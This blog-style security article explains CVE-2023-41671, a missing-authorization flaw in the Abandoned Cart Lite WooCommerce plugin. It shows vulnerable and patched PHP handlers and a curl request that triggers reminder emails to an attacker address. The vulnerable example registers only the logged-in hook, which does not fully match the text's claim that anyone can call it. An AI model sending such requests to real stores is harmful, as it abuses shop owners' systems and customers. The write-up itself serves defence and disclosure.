WordPress powers about 43% of all websites, and WooCommerce is the most popular eCommerce plugin. If you run an online shop, you probably care about keeping your store and your customer data safe. This is especially true when it comes to plugins – just one poorly coded plugin can be a backdoor for attackers.
In this article, I’ll walk you through CVE-2023-41671, a high-risk “Missing Authorization” vulnerability found in Abandoned Cart Lite for WooCommerce by Tyche Softwares, from versions *n/a* through *5.16.1*. I’ll explain what went wrong, share code examples, show how the flaw can be exploited, and, most importantly, how you can protect your shop.
What is CVE-2023-41671?
Abandoned Cart Lite helps shop owners recover sales by tracking carts that shoppers leave behind. But, starting at the project’s earliest versions and up through 5.16.1, attackers can perform sensitive operations without any real authorization. This means an attacker doesn’t need a login or special permission to interact with parts of your plugin’s backend.
This vulnerability is classified as Missing Authorization or, more technically, "Incorrectly Configured Access Control Security Levels."
Sources and reference
- NVD - CVE-2023-41671
- WPScan Advisory
- Plugin Homepage
Vulnerability Details
Affected Plugin: Abandoned Cart Lite for WooCommerce
Affected Versions: All versions up to 5.16.1
Patched Version: 5.16.2+
The plugin exposes several AJAX actions and admin pages that lack permission checks. Normally, WordPress plugins verify a user's role (e.g., only Admins or Shop Managers can access sensitive features). However, in vulnerable versions, anyone can call critical functions directly.
Below is a simplified example (not the actual plugin code, but close to what you might see)
// Vulnerable AJAX action registration
add_action('wp_ajax_wcal_resend_reminder_email', 'wcal_resend_reminder_email_handler');
function wcal_resend_reminder_email_handler() {
// No check for is_user_logged_in() or current_user_can()
$cart_id = intval($_POST['cart_id']);
$email = $_POST['email'];
// Logic to resend abandoned cart email
send_abandoned_cart_email($cart_id, $email);
echo json_encode(['status' => 'success']);
wp_die();
}
Notice: There is NO authentication or authorization check before processing the request. Anyone on the internet can POST to this AJAX action.
Exploit Scenario
Let’s say you have a WooCommerce store with the vulnerable plugin installed. An attacker can simply send a specially crafted POST request to the AJAX endpoint, triggering actions only store admins were supposed to do.
Example Exploit
curl -X POST https://yourshop.com/wp-admin/admin-ajax.php \
-d "action=wcal_resend_reminder_email" \
-d "cart_id=1234" \
-d "email=attacker@example.com"
How Was it Fixed?
In version 5.16.2, Tyche Softwares patched the plugin by adding proper authorization checks. Here’s a secure way to register an AJAX action:
add_action('wp_ajax_wcal_resend_reminder_email', 'wcal_resend_reminder_email_handler');
function wcal_resend_reminder_email_handler() {
// Only allow admins and shop managers
if (!current_user_can('manage_woocommerce')) {
wp_send_json_error(['message' => "Unauthorized"], 403);
wp_die();
}
$cart_id = intval($_POST['cart_id']);
$email = sanitize_email($_POST['email']);
send_abandoned_cart_email($cart_id, $email);
echo json_encode(['status' => 'success']);
wp_die();
}
This code checks whether the user can “manage_woocommerce” – which means only trusted users can run this function.
Summary
The CVE-2023-41671 vulnerability in Abandoned Cart Lite for WooCommerce demonstrates how small mistakes in plugin code can open the door to big headaches. If you manage a WooCommerce site, this is a reminder to keep all plugins updated, and regularly audit your site’s security.
> Stay informed. Stay protected!
> For more details, follow the vulnerability at the Official NVD listing and on WPScan.
*If you found this post useful, please share it with other WooCommerce store owners and WordPress admins!*
Timeline
Published on: 12/13/2024 15:15:23 UTC